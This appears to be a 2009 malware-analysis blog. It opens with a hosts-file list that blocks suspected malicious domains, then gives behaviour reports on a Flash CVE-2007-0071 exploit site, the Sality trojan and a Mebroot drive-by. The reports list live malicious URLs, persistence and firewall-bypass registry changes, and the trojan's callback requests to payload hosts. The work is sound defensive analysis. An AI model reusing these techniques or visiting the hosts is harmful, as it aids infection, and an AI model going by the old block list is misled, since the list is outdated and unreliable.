127.0.0.1 7322.com
127.0.0.0 ymsdkad6.cn
127.0.0.1 localhost
127.0.0.0 www.lkwueir.cn
127.0.0.1 06.jacai.com
127.0.1.1 user1.23-17.net
127.0.0.1 1.jopenkk.com
127.0.0.0 upa.luzhiai.net
127.0.0.1 1.jopenqc.com
127.0.0.0 www.guccia.net
127.0.0.1 1.joppnqq.com
127.0.0.0 4m9mnlmi.cn
127.0.0.1 1.xqhgm.com
127.0.0.0 mm119mkssd.cn
127.0.0.1 100.332233.com
127.0.0.0 61.128.171.115:8080
127.0.0.1 121.11.90.79
127.0.0.0 www.1119111.com
127.0.0.1 121565.net
127.0.0.0 win.nihao69.cn
127.0.0.1 125.90.88.38
127.0.0.1 16888.6to23.com
127.0.0.1 2.joppnqq.com
127.0.0.0 puc.lianxiac.net
127.0.0.1 204.177.92.68
127.0.0.0 pud.lianxiac.net
127.0.0.1 210.74.145.236
127.0.0.0 210.76.0.133
127.0.0.1 219.129.239.220
127.0.0.0 61.166.32.2
127.0.0.1 219.153.40.221
127.0.0.0 218.92.186.27
127.0.0.1 219.153.46.27
127.0.0.0 www.fsfsfag.cn
127.0.0.1 219.153.52.123
127.0.0.0 ovo.ovovov.cn
127.0.0.1 221.195.42.71
127.0.0.0 dw.com.com
127.0.0.1 222.73.218.115
127.0.0.1 203.110.168.233:80
127.0.0.1 3.joppnqq.com
127.0.0.1 203.110.168.221:80
127.0.0.1 363xx.com
127.0.0.1 www1.ip10086.com.cm
127.0.0.1 4199.com
127.0.0.1 blog.ip10086.com.cn
127.0.0.1 43242.com
127.0.0.1 www.ccji68.cn
127.0.0.1 5.xqhgm.com
127.0.0.0 t.myblank.cn
127.0.0.1 520.mm5208.com
127.0.0.0 x.myblank.cn
127.0.0.1 59.34.131.54
127.0.0.1 210.51.45.5
127.0.0.1 59.34.198.228
127.0.0.1 www.ew1q.cn
127.0.0.1 59.34.198.88
127.0.0.1 59.34.198.97
127.0.0.1 60.190.114.101
127.0.0.1 60.190.218.34
127.0.0.0 qq-xing.com.cn
127.0.0.1 60.191.124.252
127.0.0.1 61.145.117.212
127.0.0.1 61.157.109.222
127.0.0.1 75.126.3.216
127.0.0.1 75.126.3.217
127.0.0.1 75.126.3.218
127.0.0.0 59.125.231.177:17777
127.0.0.1 75.126.3.220
127.0.0.1 75.126.3.221
127.0.0.1 75.126.3.222
127.0.0.1 772630.com
127.0.0.1 832823.cn
127.0.0.1 8749.com
127.0.0.1 888.jopenqc.com
127.0.0.1 89382.cn
127.0.0.1 8v8.biz
127.0.0.1 97725.com
127.0.0.1 9gg.biz
127.0.0.1 www.9000music.com
127.0.0.1 test.591jx.com
127.0.0.1 a.topxxxx.cn
127.0.0.1 picon.chinaren.com
127.0.0.1 www.5566.net
127.0.0.1 p.qqkx.com
127.0.0.1 news.netandtv.com
127.0.0.1 z.neter888.cn
127.0.0.1 b.myblank.cn
127.0.0.1 wvw.wokutu.com
127.0.0.1 unionch.qyule.com
127.0.0.1 www.qyule.com
127.0.0.1 it.itjc.cn
127.0.0.1 www.linkwww.com
127.0.0.1 vod.kaicn.com
127.0.0.1 www.tx8688.com
127.0.0.1 b.neter888.cn
127.0.0.1 promote.huanqiu.com
127.0.0.1 www.huanqiu.com
127.0.0.1 www.haokanla.com
127.0.0.1 play.unionsky.cn
127.0.0.1 www.52v.com
127.0.0.1 www.gghka.cn
127.0.0.1 icon.ajiang.net
127.0.0.1 new.ete.cn
127.0.0.1 www.stiae.cn
127.0.0.1 o.neter888.cn
127.0.0.1 comm.jinti.com
127.0.0.1 www.google-analytics.com
127.0.0.1 hz.mmstat.com
127.0.0.1 www.game175.cn
127.0.0.1 x.neter888.cn
127.0.0.1 z.neter888.cn
127.0.0.1 p.etimes888.com
127.0.0.1 hx.etimes888.com
127.0.0.1 abc.qqkx.com
127.0.0.1 dm.popdm.cn
127.0.0.1 www.yl9999.com
127.0.0.1 www.dajiadoushe.cn
127.0.0.1 v.onondown.com.cn
127.0.0.1 www.interoo.net
127.0.0.1 bally1.bally-bally.net
127.0.0.1 www.bao5605509.cn
127.0.0.1 www.rty456.cn
127.0.0.1 www.werqwer.cn
127.0.0.1 1.360-1.cn
127.0.0.1 user1.23-16.net
127.0.0.1 www.guccia.net
127.0.0.1 www.interoo.net
127.0.0.1 upa.netsool.net
127.0.0.1 js.users.51.la
127.0.0.1 vip2.51.la
127.0.0.1 web.51.la
127.0.0.1 qq.gong2008.com
127.0.0.1 2008tl.copyip.com
127.0.0.1 tla.laozihuolaile.cn
127.0.0.1 www.tx6868.cn
127.0.0.1 p001.tiloaiai.com
127.0.0.1 s1.tl8tl.com
127.0.0.1 s1.gong2008.com
127.0.0.1 4b3ce56f9g.3f6e2cc5f0b.com
127.0.0.1 2be37c5f.3f6e2cc5f0b.com

May 14, 2009

Malicious Site containing SWF:CVE-2007-0071

Malicious Site:http://jjxp22.cn/a/iqq.html
Someone submitted this malicious link "http://jjxp22.cn/a/iqq.html" to me . It seems to be a pop-up or hidden link from some compromised sites.

After checking on the Page Source, i found an obfuscated Javascript (Shown below).

Obfuscated JavaScript

I de-obfuscated the Javascript and found that it uses Deconcept's SWFObject to embed malicious Shockwave Flash that compromise the Integer overflow vulnerbility in Adobe Flash Player 9.0.115.0 and earlier (CVE-2007-0071), which allows remote attackers to execute arbitrary code.

The malicious Flash files (6 of them, shown in the script below) will exploit the Flash player and download malicious executable files into the victim's system from various websites.

De-obfuscated JavaScript

Sample Flash file info
###############

Filename: i16.swf
Size: 17897
MD5: 426969FD0D7324EE170D6F46BDB203B6
Virus Found: Bloodhound.Exploit.193 (Symantec)

On the VirusTotal website, 13 out of 39 AV detected it (Shown Below).

VirusTotal

From the "Who-is" record, the IP (61.164.108.35) belongs to RuiAn Telecom (China).

Who-is record

May 5, 2009

Malware analysis: Trojan W32/Sality

I have receive a suspcious file from my colleague this morning and done a simple behaviour analysis on it.

Analysis Report:
##############

Filename: ~.exe
MD5: 3A03A20BFEFE3FDD01659D47D2ED76C8
Virus Found: W32/Sality (McAfee), TROJ_DLOADER.XOP (TrendMicro), Mal/Generic-A (Sophos), Trojan-Downloader.Win32.Agent.brxr (Kaspersky,F-Secure),

On the VirusTotal website, 36 out of 40 AV detected it (details).



Registry values added:
================
1>
HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\C:\Documents and Settings\Owner\Desktop\~.exe: "C:\Documents and Settings\Owner\Desktop\~.exe:*:Enabled:ipsec"

2> HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\C:\Documents and Settings\Owner\Desktop\~.exe: "C:\Documents and Settings\Owner\Desktop\~.exe:*:Enabled:ipsec"

The above registry setting add the malware into the Windows firewall rules and name it as "ipsec" (shown above).

3>
HKU\S-1-5-21-1085031214-926492609-839522115-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs\24: 73 00 65 00 63 00 31 00 2E 00 78 00 6D 00 6C 00 00 00 4C 00 32 00 00 00 00 00 00 00 00 00 00 00 73 65 63 31 2E 78 6D 6C 2E 6C 6E 6B 00 00 30 00 03 00 04 00 EF BE 00 00 00 00 00 00 00 00 14 00 00 00 73 00 65 00 63 00 31 00 2E 00 78 00 6D 00 6C 00 2E 00 6C 00 6E 00 6B 00 00 00 1C 00 00 00

4>
HKU\S-1-5-21-1085031214-926492609-839522115-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs\.xml\1: 73 00 65 00 63 00 31 00 2E 00 78 00 6D 00 6C 00 00 00 4C 00 32 00 00 00 00 00 00 00 00 00 00 00 73 65 63 31 2E 78 6D 6C 2E 6C 6E 6B 00 00 30 00 03 00 04 00 EF BE 00 00 00 00 00 00 00 00 14 00 00 00 73 00 65 00 63 00 31 00 2E 00 78 00 6D 00 6C 00 2E 00 6C 00 6E 00 6B 00 00 00 1C 00 00 00

5>
HKU\S-1-5-21-1085031214-926492609-839522115-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACNGU:P:\Qbphzragf naq Frggvatf\Bjare\Qrfxgbc\~.rkr: 08 00 00 00 06 00 00 00 80 F4 57 31 2D CD C9 01

6>
HKU\S-1-5-21-1085031214-926492609-839522115-1003\Software\Microsoft\Windows\ShellNoRoam\MUICache\@C:\WINDOWS\system32\SHELL32.dll,-22913: "Shows the disk drives and hardware connected to this computer."

7>
HKU\S-1-5-21-1085031214-926492609-839522115-1003\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\Documents and Settings\Owner\Desktop\~.exe: "~"

Registry values modified:
==================
1> HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Prefetcher\TracesProcessed: 0x00000010

2> HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Prefetcher\TracesProcessed: 0x00000011

3> HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell: "Explorer.exe"

4> HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell: "Explorer.exe "C:\Documents and Settings\Owner\Desktop\~.exe""

5> HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Epoch\Epoch: 0x00000039

6> HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Epoch\Epoch: 0x0000003A

7> HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Epoch\Epoch: 0x00000039

8> HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Epoch\Epoch: 0x0000003A

Files modifed:
==========
1> C:\Documents and Settings\Owner\Cookies\index.dat

2> C:\Documents and Settings\Owner\Local Settings\History\History.IE5\index.dat

3> C:\Documents and Settings\Owner\Local Settings\Temporary Internet Files\Content.IE5\index.dat

4> C:\WINDOWS\system.ini

5> C:\WINDOWS\system32\config\software.LOG

6> C:\WINDOWS\system32\config\system.LOG

Other behaviours:
=============
System conecting to:
1> peskostruikaz.com:80
The following HTTP request found:
" GET /auq.php?8e54ce=1332546&id=2554099245826 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; en) Opera 8.57
Host: peskostruikaz.com
Cache-Control: no-cache"


2> johnsonbodyshop.com:80
No request after initial handshake.

3> shopatforgetmenot.com:80
The following HTTP request found:
GET /images/mainlogo.gif?58fb0a=833062&id=2554099245826 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; en) Opera 8.57
Host: shopatforgetmenot.com
Cache-Control: no-cache"

4> corporateshelters.com:80
No request after initial handshake.

Seems like the malware trying to download more malicious payload from "peskostruikaz.com/auq.php" and "shopatforgetmenot.com/images/mainlogo.gif".

Apr 28, 2009

Malicious Website: u-toys.com

U-toys.com

This Website "www.u-toys.com" was forwarded to me by commandrine as an suspicious website. While accessing the website, there seems to be a JavaScript running. By checking on the page source (HTML code), there is a obfuscated JavaScript (shown below). It seems to be created by some JavaScript Obfuscator application that i am not able to de-obfuscated.

Obfuscated Javascript

After doing some behaviour analysis on the Javascript, it seems to be exploiting on some Internet browser vulnerabilities. It manage to inject an executable files into the C:\ folder on older and unpatched browser. Newly patched browser do not seems to find any "injected" files. Below is the analysis on the executable file.

Analysis Report:
##############

Filename: b01kyk.exe
Size: 327680
MD5: 615A8484F113DA99D2C172A44C9E7D31
Virus found: Trojan:W32/Mebroot.gen!A (F-Secure)

On the VirusTotal website, 11 out of 38 AV detected it (Shown below). Well-known AV not detected (Symantec, McAfee).

VirusTotal

Registry values added:
================
1> HKLM\SYSTEM\ControlSet001\Control\Session Manager\PendingFileRenameOperations: 5C 3F 3F 5C 43 3A 5C 44 6F 63 75 6D 65 6E 74 73 20 61 6E 64 20 53 65 74 74 69 6E 67 73 5C 4F 77 6E 65 72 5C 44 65 73 6B 74 6F 70 5C 62 30 31 6B 79 6B 2E 65 78 65 00 00 5C 3F 3F 5C 43 3A 5C 44 4F 43 55 4D 45 7E 31 5C 4F 77 6E 65 72 5C 4C 4F 43 41 4C 53 7E 31 5C 54 65 6D 70 5C 44 2E 74 6D 70 00 00 5C 3F 3F 5C 43 3A 5C 44 6F 63 75 6D 65 6E 74 73 20 61 6E 64 20 53 65 74 74 69 6E 67 73 5C 4F 77 6E 65 72 5C 44 65 73 6B 74 6F 70 5C 62 30 31 6B 79 6B 2E 65 78 65 00 00 5C 3F 3F 5C 43 3A 5C 44 4F 43 55 4D 45 7E 31 5C 4F 77 6E 65 72 5C 4C 4F 43 41 4C 53 7E 31 5C 54 65 6D 70 5C 45 2E 74 6D 70 00 00 5C 3F 3F 5C 43 3A 5C 44 4F 43 55 4D 45 7E 31 5C 4F 77 6E 65 72 5C 4C 4F 43 41 4C 53 7E 31 5C 54 65 6D 70 5C 45 2E 74 6D 70 00 00 5C 3F 3F 5C 63 3A 5C 64 6F 63 75 6D 65 7E 31 5C 6F 77 6E 65 72 5C 6C 6F 63 61 6C 73 7E 31 5C 74 65 6D 70 5C 65 2E 74 6D 70 00 00 5C 3F 3F 5C 43 3A 5C 57 49 4E 44 4F 57 53 5C 54 45 4D 50 5C 46 2E 74 6D 70 00 00 00

2> HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\PendingFileRenameOperations: 5C 3F 3F 5C 43 3A 5C 44 6F 63 75 6D 65 6E 74 73 20 61 6E 64 20 53 65 74 74 69 6E 67 73 5C 4F 77 6E 65 72 5C 44 65 73 6B 74 6F 70 5C 62 30 31 6B 79 6B 2E 65 78 65 00 00 5C 3F 3F 5C 43 3A 5C 44 4F 43 55 4D 45 7E 31 5C 4F 77 6E 65 72 5C 4C 4F 43 41 4C 53 7E 31 5C 54 65 6D 70 5C 44 2E 74 6D 70 00 00 5C 3F 3F 5C 43 3A 5C 44 6F 63 75 6D 65 6E 74 73 20 61 6E 64 20 53 65 74 74 69 6E 67 73 5C 4F 77 6E 65 72 5C 44 65 73 6B 74 6F 70 5C 62 30 31 6B 79 6B 2E 65 78 65 00 00 5C 3F 3F 5C 43 3A 5C 44 4F 43 55 4D 45 7E 31 5C 4F 77 6E 65 72 5C 4C 4F 43 41 4C 53 7E 31 5C 54 65 6D 70 5C 45 2E 74 6D 70 00 00 5C 3F 3F 5C 43 3A 5C 44 4F 43 55 4D 45 7E 31 5C 4F 77 6E 65 72 5C 4C 4F 43 41 4C 53 7E 31 5C 54 65 6D 70 5C 45 2E 74 6D 70 00 00 5C 3F 3F 5C 63 3A 5C 64 6F 63 75 6D 65 7E 31 5C 6F 77 6E 65 72 5C 6C 6F 63 61 6C 73 7E 31 5C 74 65 6D 70 5C 65 2E 74 6D 70 00 00 5C 3F 3F 5C 43 3A 5C 57 49 4E 44 4F 57 53 5C 54 45 4D 50 5C 46 2E 74 6D 70 00 00 00

3> HKU\S-1-5-21-1085031214-926492609-839522115-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACNGU:P:\Qbphzragf naq Frggvatf\Bjare\Qrfxgbc\o01xlx.rkr: 0B 00 00 00 06 00 00 00 00 78 6B 45 46 D4 C9 01

4> HKU\S-1-5-21-1085031214-926492609-839522115-1003\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\Documents and Settings\Owner\Desktop\b01kyk.exe: "b01kyk"

Registry values modified:
==================
1> HKLM\SYSTEM\CurrentControlSet\Control\ServiceCurrent\: 0x0000000B

2> HKLM\SYSTEM\CurrentControlSet\Control\ServiceCurrent\: 0x0000000C

3> HKU\S-1-5-21-1085031214-926492609-839522115-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_HVFPHG: 0B 00 00 00 7F 00 00 00 70 D2 53 1A 46 D4 C9 01

4> HKU\S-1-5-21-1085031214-926492609-839522115-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_HVFPHG: 0B 00 00 00 80 00 00 00 20 91 5F 45 46 D4 C9 01

5> HKU\S-1-5-21-1085031214-926492609-839522115-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACNGU: 0B 00 00 00 D3 00 00 00 20 5B 70 1A 46 D4 C9 01

6> HKU\S-1-5-21-1085031214-926492609-839522115-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACNGU: 0B 00 00 00 D4 00 00 00 00 78 6B 45 46 D4 C9 01

w01f advise: Always patched up your Internet browser and beware of suspicious scripts and pop-up running in the website.

Other reports on this site:
- Security Republic - Innocent???

Mar 27, 2009

Welcome

This site is created to provide a platform for anyone to share their ideas, experiences and findings on malware analysis. Feel free to comment or e-mail me any suspicious files.

Mar 22, 2009

Info on Conficker

Found some excellent read-ups on Conficker virus by the researchers at SRI International. It is one of the best analysis on the malware so far. You can find those reports from the link below.

- An Analysis of Conficker
- Addendum on Conficker C

There are others Malware information from the SRI Malware Threat Center.